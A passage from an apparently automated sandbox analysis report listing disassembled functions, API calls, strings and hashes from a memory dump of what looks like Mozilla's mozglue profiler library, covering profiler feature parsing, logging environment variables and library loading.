                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process$CurrentTerminate
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2429186680-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 25ce86b1801e4499871e3291e4349bcda2c9ee60c04ceca5766ccf145d11c721
                                                                                                                                                                                                                                                                                        • Instruction ID: 185534ce8f289f252d1c5f603062cda4f284b50dcc17ff7a5b3d457368a920cd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 25ce86b1801e4499871e3291e4349bcda2c9ee60c04ceca5766ccf145d11c721
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F4717C75E012198FCB18CFA8D8915EEBBB6FF89314F24816ED416AB744D731A906CF90
                                                                                                                                                                                                                                                                                        Function 6C9A58E0 Relevance: .2, Instructions: 206COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process$CurrentTerminate
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2429186680-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 951b0a1a16b43d55b0f83233c587641632b93214faccf13e7b62fda1c7327c38
                                                                                                                                                                                                                                                                                        • Instruction ID: 5d4c60100473a5be67758edd216465f545d3783538c42449a8a5739c361d1882
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 951b0a1a16b43d55b0f83233c587641632b93214faccf13e7b62fda1c7327c38
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D1817C75A016199FCB04CFA8D880AEEBBF6FF89314F644269D411BB741D731E946CBA0
                                                                                                                                                                                                                                                                                        Function 6C9ACC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 4073 6c9acc00-6c9acc11 4074 6c9acd70 4073->4074 4075 6c9acc17-6c9acc19 4073->4075 4076 6c9acd72-6c9acd7b 4074->4076 4077 6c9acc1b-6c9acc31 strcmp 4075->4077 4078 6c9acc37-6c9acc4a strcmp 4077->4078 4079 6c9acd25 4077->4079 4080 6c9acd2a-6c9acd30 4078->4080 4081 6c9acc50-6c9acc60 strcmp 4078->4081 4079->4080 4080->4077 4082 6c9acd36 4080->4082 4083 6c9acd38-6c9acd3d 4081->4083 4084 6c9acc66-6c9acc76 strcmp 4081->4084 4082->4076 4083->4080 4085 6c9acd3f-6c9acd44 4084->4085 4086 6c9acc7c-6c9acc8c strcmp 4084->4086 4085->4080 4087 6c9acc92-6c9acca2 strcmp 4086->4087 4088 6c9acd46-6c9acd4b 4086->4088 4089 6c9acca8-6c9accb8 strcmp 4087->4089 4090 6c9acd4d-6c9acd52 4087->4090 4088->4080 4091 6c9accbe-6c9accce strcmp 4089->4091 4092 6c9acd54-6c9acd59 4089->4092 4090->4080 4093 6c9acd5b-6c9acd60 4091->4093 4094 6c9accd4-6c9acce4 strcmp 4091->4094 4092->4080 4093->4080 4095 6c9acd62-6c9acd67 4094->4095 4096 6c9acce6-6c9accf6 strcmp 4094->4096 4095->4080 4097 6c9accf8-6c9acd08 strcmp 4096->4097 4098 6c9acd69-6c9acd6e 4096->4098 4099 6c9aceb9-6c9acebe 4097->4099 4100 6c9acd0e-6c9acd1e strcmp 4097->4100 4098->4080 4099->4080 4101 6c9acd7c-6c9acd8c strcmp 4100->4101 4102 6c9acd20-6c9acec8 4100->4102 4103 6c9acecd-6c9aced2 4101->4103 4104 6c9acd92-6c9acda2 strcmp 4101->4104 4102->4080 4103->4080 4106 6c9acda8-6c9acdb8 strcmp 4104->4106 4107 6c9aced7-6c9acedc 4104->4107 4108 6c9acdbe-6c9acdce strcmp 4106->4108 4109 6c9acee1-6c9acee6 4106->4109 4107->4080 4110 6c9aceeb-6c9acef0 4108->4110 4111 6c9acdd4-6c9acde4 strcmp 4108->4111 4109->4080 4110->4080 4112 6c9acdea-6c9acdfa strcmp 4111->4112 4113 6c9acef5-6c9acefa 4111->4113 4114 6c9aceff-6c9acf04 4112->4114 4115 6c9ace00-6c9ace10 strcmp 4112->4115 4113->4080 4114->4080 4116 6c9acf09-6c9acf0e 4115->4116 4117 6c9ace16-6c9ace26 strcmp 4115->4117 4116->4080 4118 6c9ace2c-6c9ace3c strcmp 4117->4118 4119 6c9acf13-6c9acf18 4117->4119 4120 6c9acf1d-6c9acf22 4118->4120 4121 6c9ace42-6c9ace52 strcmp 4118->4121 4119->4080 4120->4080 4122 6c9ace58-6c9ace68 strcmp 4121->4122 4123 6c9acf27-6c9acf2c 4121->4123 4124 6c9ace6e-6c9ace7e strcmp 4122->4124 4125 6c9acf31-6c9acf36 4122->4125 4123->4080 4126 6c9acf3b-6c9acf40 4124->4126 4127 6c9ace84-6c9ace99 strcmp 4124->4127 4125->4080 4126->4080 4127->4080 4128 6c9ace9f-6c9aceb4 call 6c9a94d0 call 6c9acf50 4127->4128 4128->4080
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C97582D), ref: 6C9ACC27
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C97582D), ref: 6C9ACC3D
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C9DFE98,?,?,?,?,?,6C97582D), ref: 6C9ACC56
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C97582D), ref: 6C9ACC6C
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C97582D), ref: 6C9ACC82
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C97582D), ref: 6C9ACC98
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C97582D), ref: 6C9ACCAE
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C9ACCC4
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C9ACCDA
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C9ACCEC
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C9ACCFE
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C9ACD14
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C9ACD82
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C9ACD98
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C9ACDAE
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C9ACDC4
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C9ACDDA
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C9ACDF0
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C9ACE06
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C9ACE1C
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C9ACE32
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C9ACE48
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C9ACE5E
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C9ACE74
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C9ACE8A
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: strcmp
                                                                                                                                                                                                                                                                                        • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                                                                                                                                                                                                                        • API String ID: 1004003707-2809817890
                                                                                                                                                                                                                                                                                        • Opcode ID: 2ce3fc2b65e1df1d1df83457439cb152784e19b7d9c163ee3055b682f8c20a91
                                                                                                                                                                                                                                                                                        • Instruction ID: dab010c6254599a331f99b44fb7154cf41ec0d4256262a93ff03c197371ade1f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ce3fc2b65e1df1d1df83457439cb152784e19b7d9c163ee3055b682f8c20a91
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1051B8D1905A2612FB0132D52D11BAA7548EFB724AF11843AED0ABDF80FF06F61B45B7
                                                                                                                                                                                                                                                                                        Function 6C9747C0 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 232threadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C974801
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C974817
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C97482D
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C97484A
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99AB3F: EnterCriticalSection.KERNEL32(6C9EE370,?,?,6C963527,6C9EF6CC,?,?,?,?,?,?,?,?,6C963284), ref: 6C99AB49
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99AB3F: LeaveCriticalSection.KERNEL32(6C9EE370,?,6C963527,6C9EF6CC,?,?,?,?,?,?,?,?,6C963284,?,?,6C9856F6), ref: 6C99AB7C
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C97485F
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C97487E
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C9EF4B8), ref: 6C97488B
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C97493A
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C974956
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C974960
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C9EF4B8), ref: 6C97499A
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99AB89: EnterCriticalSection.KERNEL32(6C9EE370,?,?,?,6C9634DE,6C9EF6CC,?,?,?,?,?,?,?,6C963284), ref: 6C99AB94
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99AB89: LeaveCriticalSection.KERNEL32(6C9EE370,?,6C9634DE,6C9EF6CC,?,?,?,?,?,?,?,6C963284,?,?,6C9856F6), ref: 6C99ABD1
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C9749C6
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C9749E9
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C985E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C985EDB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C985E90: memset.VCRUNTIME140(6C9C7765,000000E5,55CCCCCC), ref: 6C985F27
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C985E90: LeaveCriticalSection.KERNEL32(?), ref: 6C985FB2
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • MOZ_PROFILER_SHUTDOWN, xrefs: 6C974A42
                                                                                                                                                                                                                                                                                        • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C974828
                                                                                                                                                                                                                                                                                        • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C974812
                                                                                                                                                                                                                                                                                        • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C9747FC
                                                                                                                                                                                                                                                                                        • [I %d/%d] profiler_shutdown, xrefs: 6C974A06
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
                                                                                                                                                                                                                                                                                        • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
                                                                                                                                                                                                                                                                                        • API String ID: 1340022502-4194431170
                                                                                                                                                                                                                                                                                        • Opcode ID: 09d37059e9485f5cb939e8e5b31f392597fd25b1e481afc8c2643cc311605fa4
                                                                                                                                                                                                                                                                                        • Instruction ID: cdc7aef73ddd365cbf35201616628232fc6466abfdfca2354ad483032cdcf679
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09d37059e9485f5cb939e8e5b31f392597fd25b1e481afc8c2643cc311605fa4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 45812471A06200CBEB64DF28D84875A3775BF6A31CF24062AD91697B43E731E944CFA6
                                                                                                                                                                                                                                                                                        Function 6C974470 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 178libraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C974730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C9744B2,6C9EE21C,6C9EF7F8), ref: 6C97473E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C974730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C97474A
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C9744BA
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C9744D2
                                                                                                                                                                                                                                                                                        • InitOnceExecuteOnce.KERNEL32(6C9EF80C,6C96F240,?,?), ref: 6C97451A
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C97455C
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 6C974592
                                                                                                                                                                                                                                                                                        • InitializeCriticalSection.KERNEL32(6C9EF770), ref: 6C9745A2
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000008), ref: 6C9745AA
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000018), ref: 6C9745BB
                                                                                                                                                                                                                                                                                        • InitOnceExecuteOnce.KERNEL32(6C9EF818,6C96F240,?,?), ref: 6C974612
                                                                                                                                                                                                                                                                                        • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C974636
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(user32.dll), ref: 6C974644
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C97466D
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C97469F
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C9746AB
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C9746B2
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C9746B9
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C9746C0
                                                                                                                                                                                                                                                                                        • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C9746CD
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 6C9746F1
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C9746FD
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                                                                                                                                                                                                                        • String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                                                                                                                                                                                                                        • API String ID: 1702738223-3894940629
                                                                                                                                                                                                                                                                                        • Opcode ID: ba6186cc0a9d32f7075c6fe85e9289580dcd09be687a055cba043cad8f9f5b7a
                                                                                                                                                                                                                                                                                        • Instruction ID: 6c8001da77f00616909d5cdb2e9b5e432c4615f53ee91d71125fcd12a1ee1bcb
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ba6186cc0a9d32f7075c6fe85e9289580dcd09be687a055cba043cad8f9f5b7a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A16127B1609344EFEB218F61DC09B9577B8EFAE70CF248499E5049B642D771CA44CFA1
                                                                                                                                                                                                                                                                                        Function 6C9AE8B0 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 297threadsynchronizationCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A7090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6C9AB9F1,?), ref: 6C9A7107
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C9ADCF5), ref: 6C9AE92D
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9AEA4F
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C9EF4B8), ref: 6C9AEA5C
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C9EF4B8), ref: 6C9AEA80
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9AEA8A
                                                                                                                                                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C9ADCF5), ref: 6C9AEA92
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9AEB11
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C9EF4B8), ref: 6C9AEB1E
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,000000E0), ref: 6C9AEB3C
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C9EF4B8), ref: 6C9AEB5B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A5710: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C9AEB71), ref: 6C9A57AB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99CBE8: GetCurrentProcess.KERNEL32(?,6C9631A7), ref: 6C99CBF1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9631A7), ref: 6C99CBFA
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C974A68), ref: 6C9A945E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9A9470
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9A9482
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: __Init_thread_footer.LIBCMT ref: 6C9A949F
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9AEBA4
                                                                                                                                                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6C9AEBAC
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9A94EE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C9A9508
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9AEBC1
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C9EF4B8,?,?,00000000), ref: 6C9AEBCE
                                                                                                                                                                                                                                                                                        • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6C9AEBE5
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C9EF4B8,00000000), ref: 6C9AEC37
                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C9AEC46
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6C9AEC55
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C9AEC5C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • [I %d/%d] profiler_start, xrefs: 6C9AEBB4
                                                                                                                                                                                                                                                                                        • [I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6C9AEA9B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExclusiveLock$Current$ReleaseThread$Acquiregetenv$Process_getpid$?profiler_init@baseprofiler@mozilla@@CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintffreemallocmemset
                                                                                                                                                                                                                                                                                        • String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
                                                                                                                                                                                                                                                                                        • API String ID: 1341148965-1186885292
                                                                                                                                                                                                                                                                                        • Opcode ID: c9420bc0aa32cdd7b0d474505409d15a1a1c50cfc5fed2be34274c580b54314a
                                                                                                                                                                                                                                                                                        • Instruction ID: 83e9bcd2a02299f8544257fea0ba4ff7711a0a8f837b4db0aecfba8a223d3c62
